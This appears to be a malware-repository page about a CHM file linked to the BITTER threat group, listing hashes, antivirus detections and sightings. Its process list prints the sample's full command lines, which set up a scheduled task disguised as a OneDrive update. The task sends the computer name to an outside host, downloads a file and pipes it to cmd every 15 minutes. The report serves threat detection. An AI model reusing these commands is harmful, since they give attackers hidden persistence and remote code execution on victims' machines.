9fd7522643ce8c67ed5ca7a58eba5451dc802cfc054c36f3cb89d073976c9676

Classification: Malicious

9fd7522643ce8c67ed5ca7a58eba5451dc802cfc054c36f3cb89d073976c9676 is a malicious file sample. Linked to Bitter activity. Detected by 20 antivirus engines.

Detection summary

  • 20 antivirus detections
  • 0 IDS alerts
  • 3 processes observed
  • 0 contacted hosts
  • 0 DNS requests

MITRE ATT&CK associations

Intrusion sets: BITTER (G1002)

Blacklist sightings

Description Source First seen Last seen Labels MITRE ATT&CK
Generic Malware Hybrid-Analysis 2025-01-02 05:45:03 2025-01-02 08:15:16
Bitter MalwareBazaar Abuse.ch 2024-12-31 10:23:06 2024-12-31 10:23:06 malicious-activity G1002 BITTER

Tags

exploit

Sample information

Filenames
9fd7522643ce8c67ed5ca7a58eba5451dc802cfc054c36f3cb89d073976c9676
File type
application/octet-stream
Size
13264 bytes
MD5
5c9f2b56ab3724e2d31540c389484db8
SHA-1
46428480d79454c775310d2acfe953a2d7a81770
SHA-256
9fd7522643ce8c67ed5ca7a58eba5451dc802cfc054c36f3cb89d073976c9676
First indexed
2024-12-31 11:04:40
Last updated
2026-03-05 06:17:54

Antivirus detections

EngineDetection
ALYacJS:Trojan.Cryxos.14060
AVGHTML:Runner-S [Trj]
ArcabitExploit.CHM-Downloader.Gen [many]
AvastHTML:Runner-S [Trj]
BitDefenderExploit.CHM-Downloader.Gen
CTXchm.trojan.cryxos
ESET-NOD32HTML/TrojanDownloader.Agent.NKU
EmsisoftExploit.CHM-Downloader.Gen (B)
FireEyeExploit.CHM-Downloader.Gen
FortinetHLP/Agent.G2!tr
GDataJS:Trojan.Cryxos.14060
GoogleDetected
IkarusTrojan.HTML.Agent
KasperskyHEUR:Trojan.Script.Generic
MicroWorld-eScanExploit.CHM-Downloader.Gen
RisingTrojan.MouseJack/HTML!1.BE26 (CLASSIC)
SangforExploit.Generic-Script.Save.826282b3
TrendMicroHEUR_CHM.E
VIPREExploit.CHM-Downloader.Gen
huorongHEUR:TrojanDownloader/HTML.Agent.c

Process list

NameCommand line
hh.exeC:\9fd7522643ce8c67ed5ca7a58eba5451dc802cfc054c36f3cb89d073976c9676.chm
cmd.exe/c start /min schtasks /create /tn MicrosoftOneDriveUpdateTask /f /sc minute /mo 15 /tr "mshta vbscript:Execute('CreateObject(''WScript.Shell'').Run ''cmd /c curl -o %PUBLIC%\documents\tmp.jpg https://www.kaatsonlinesupport.com/KVD.php?K=%computername%&More %PUBLIC%\documents\tmp.jpg|cmd'', 0, True:close')"
schtasks.exeschtasks /create /tn MicrosoftOneDriveUpdateTask /f /sc minute /mo 15 /tr "mshta vbscript:Execute('CreateObject(''WScript.Shell'').Run ''cmd /c curl -o %PUBLIC%\documents\tmp.jpg https://www.kaatsonlinesupport.com/KVD.php?K=l296EHUgfX&More %PUBLIC%\documents\tmp.jpg|cmd'', 0, True:close')"